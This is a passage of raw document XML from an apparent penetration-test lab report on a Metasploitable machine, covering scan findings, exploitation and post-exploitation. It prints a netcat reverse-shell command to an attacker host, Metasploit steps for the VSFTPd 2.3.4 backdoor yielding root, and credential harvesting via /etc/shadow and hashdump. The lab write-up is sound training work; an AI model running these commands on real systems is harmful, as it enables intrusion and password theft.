      <w:tr w:rsidR="0004042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139/tcp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NetBIOS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Samba 3.0.20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HIGH — Known vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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445/tcp</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SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>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Samba 3.0.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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HIGH — Known vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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3306/tcp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MySQL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5.0.51a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CRITICAL — No root password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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5900/tcp</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VNC</w:t>
            </w:r>
          </w:p>
        </w:tc>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Protocol 3.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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HIGH — No authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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6667/tcp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IRC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UnrealIRCd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CRITICAL — Known backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The scan immediately revealed VSFTPd 2.3.4 — a version with a well-documented deliberate backdoor inserted into the source code in 2011. This became the primary exploitation target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CC0000"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>4. Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 Finding 1 — Manual Reverse Shell via Netcat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">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40423" w:rsidTr="00BD0E2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80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vulnerab</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remote code execution via exposed shell access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00040423" w:rsidTr="00BD0E2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80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity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sidRPr="00BD0E21">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00040423" w:rsidTr="00BD0E2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80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00040423" w:rsidTr="00BD0E2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80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tool Used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color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Netcat (nc)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00040423" w:rsidTr="00BD0E2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80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Access Gained</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Interactive shell as msfadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00040423" w:rsidTr="00BD0E2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80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK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color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1059.004 — Unix Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>A Netcat listener was started on the attacker machine (Kali) to catch the incoming connection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The following command was executed on the target machine, instructing it to connect back to the attacker and pipe shell I/O over the TCP connectio</w:t>
      </w:r>
      <w:r>
        <w:t>n:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nc 192.168.56.6 4444 -e /bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The connection was established immediately. The attacker received an interactive shell on the target machine. The following commands were run to confirm access and gather system information:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>whoami     → msfadmin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>id         → uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm)...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>hostname   → metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>uname -a   → Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence: Full shell session captured in Wireshark TCP stream (see Secti</w:t>
      </w:r>
      <w:r>
        <w:t>on 5 — Traffic Analysis).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 Finding 2 — VSFTPd 2.3.4 Backdoor (CVE-2011-2523)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">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40423" w:rsidTr="00BD0E2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80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Deliberate backdoor in VSFTPd 2.3.4 source code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00040423" w:rsidTr="00BD0E2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80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity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sidRPr="00BD0E21">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00040423" w:rsidTr="00BD0E2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80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2011-2523</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00040423" w:rsidTr="00BD0E2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80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS Score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Pr="00BD0E21" w:rsidRDefault="007200C9">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD0E21">
              <w:rPr>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.0 (Critical)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00040423" w:rsidTr="00BD0E2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80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tool Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metasploit Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00040423" w:rsidTr="00BD0E2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80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Module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color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>exploit/unix/ftp/vsftpd_234_backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00040423" w:rsidTr="00BD0E2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80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Access Gained</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Root shell — uid=0(root)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00040423" w:rsidTr="00BD0E2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943634" w:themeFill="accent2" w:themeFillShade="BF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK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color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1190 — Exploit Public-Facing Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>VSFTPd 2.3.4 contains a backdoor that was deliberately introduced into the source code. When a username containing the string '</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD0E21">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:)</w:t>
      </w:r>
      <w:r>
        <w:t>' is sent during authentication, the daemon spawns a root shell on port 6200. This is triggered regardless of the password prov</w:t>
      </w:r>
      <w:r>
        <w:t>ided.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation steps in Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>msf6 &gt; use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>msf6 &gt; set RHOSTS 192.168.56.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>msf6 &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Output confirming root access:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[+] 192.168.56.5:21 - UID: uid=0(root) gid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[*] Command shell session 1 opened (192.168.56.6:46443 -&gt; 192.168.56.5:6200)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.3 Post-Exploitation — Meterpreter Session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The basic command shell from the VSFTPd exploit was upgraded to a full Meterpreter session for advanced post-exploitation capabilities</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>msf6 &gt; sessions -u 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[*] Meterpreter session 2 opened (192.168.56.6:4433 -&gt; 192.168.56.5:41066)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="007200C9">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Post-exploitation activities performed with Meterpreter:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00040423" w:rsidRDefault="00040423">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3400"/>
        <w:gridCol w:w="3262"/>
      </w:tblGrid>
      <w:tr w:rsidR="00040423">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Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="35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Output / Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="336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Significance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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sysinfo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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Linux metasploitable 2.6.24-16-server i686</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Full system fingerprint obtained</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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getuid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Server username: root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Confirmed root-level access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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ps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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Full process list retrieved</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Identified running services and processes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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shell + cat /etc/shadow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All password hashes extracted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Credential harvesting — offline cracking possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004042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run post/linux/gather/hashdump</w:t>
            </w:r>
          </w:p>
